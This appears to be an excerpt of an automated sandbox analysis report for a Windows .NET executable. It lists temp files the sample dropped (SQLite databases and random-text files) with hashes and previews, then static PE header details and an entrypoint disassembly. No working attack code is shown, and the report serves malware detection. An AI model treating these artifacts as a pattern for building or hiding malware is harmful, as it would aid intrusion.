MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB710.tmp

Download File

Process:	C:\Users\user\Desktop\lWnSA7IyVc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpD0B5.tmp

Download File

Process:	C:\Users\user\Desktop\lWnSA7IyVc.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\Temp\tmpD0B6.tmp

Download File

Process:	C:\Users\user\Desktop\lWnSA7IyVc.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\Temp\tmpD0C6.tmp

Download File

Process:	C:\Users\user\Desktop\lWnSA7IyVc.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\Temp\tmpD0C7.tmp

Download File

Process:	C:\Users\user\Desktop\lWnSA7IyVc.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\Temp\tmpD0C8.tmp

Download File

Process:	C:\Users\user\Desktop\lWnSA7IyVc.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Local\Temp\tmpD0C9.tmp

Download File

Process:	C:\Users\user\Desktop\lWnSA7IyVc.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\Temp\tmpEFF3.tmp

Download File

Process:	C:\Users\user\Desktop\lWnSA7IyVc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpEFF4.tmp

Download File

Process:	C:\Users\user\Desktop\lWnSA7IyVc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF005.tmp

Download File

Process:	C:\Users\user\Desktop\lWnSA7IyVc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF016.tmp

Download File

Process:	C:\Users\user\Desktop\lWnSA7IyVc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF026.tmp

Download File

Process:	C:\Users\user\Desktop\lWnSA7IyVc.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpF027.tmp

Download File

Process:	C:\Users\user\Desktop\lWnSA7IyVc.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.7741335704632055
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	lWnSA7IyVc.exe
File size:	703'488 bytes
MD5:	3726ee297e39481c17efbe020ef5cfcc
SHA1:	905988b5b2601a21688bc002e79fad8855969d25
SHA256:	7010f01eb61a3e6171cff3f45dffda217cab75fcd8e6055d37bb9976d1e8294f
SHA512:	dcb386b1c12f993e62376949cbe6437ffbc3c44c3c572c6c1da38bad00778caa22946538e685b2e2eff49cc87a139ae385db88ca39a963d84c58db2031880cff
SSDEEP:	12288:d2sv+SGjpA3yKUUo6aYqcpeLWMynFE9gjuozkBfe3bnFtA6E2Y09dCvzCnYb+iX:d2xjCqyQCFPjuSv3hC6E3090LCnYn
TLSH:	85E40164169ED806C4D30B744973E2B957748DCEFD16C70B9BDA7EEF382B25628803A1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Gg..............0...... ........... ........@.. ....................................@................................

File Icon


Icon Hash:	1bb3b3b3b3d389b3

Static PE Info

General

Entrypoint:	0x4ab8b2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6747D6B4 [Thu Nov 28 02:34:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
adc dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], bh
add byte ptr [eax], al
add byte ptr [eax+00h], al
add byte ptr [eax], al
push edi
add byte ptr [eax], al
add byte ptr [ebp+00h], bl
add byte ptr [eax], al
pop edi
add byte ptr [eax], al
add byte ptr [edx+00h], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], cl
add byte ptr [eax], al
add byte ptr [edi], bl
add byte ptr [eax], al
add byte ptr [edx], ch
add byte ptr [eax], al
add byte ptr [eax+eax+00h], dl
add byte ptr [ebx+00h], al
add byte ptr [eax], al
pop ebx
add byte ptr [eax], al
add byte ptr [eax+eax+00h], ah
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
or dword ptr [eax], eax
add byte ptr [eax], al
adc eax, 1C000000h
add byte ptr [eax], al
add byte ptr [ebx], dh
add byte ptr [eax], al
add byte ptr [edi+00h], al
add byte ptr [eax], al
push eax
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [ebx], dl
add byte ptr [eax], al
add byte ptr [eax+eax], bh
add byte ptr [eax], al
sbb byte ptr [eax], al
add byte ptr [eax], al
dec ecx
add byte ptr [eax], al
add byte ptr [ebx+00h], cl
add byte ptr [eax], al
dec edi
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xab860	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xac000	0x1c34	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
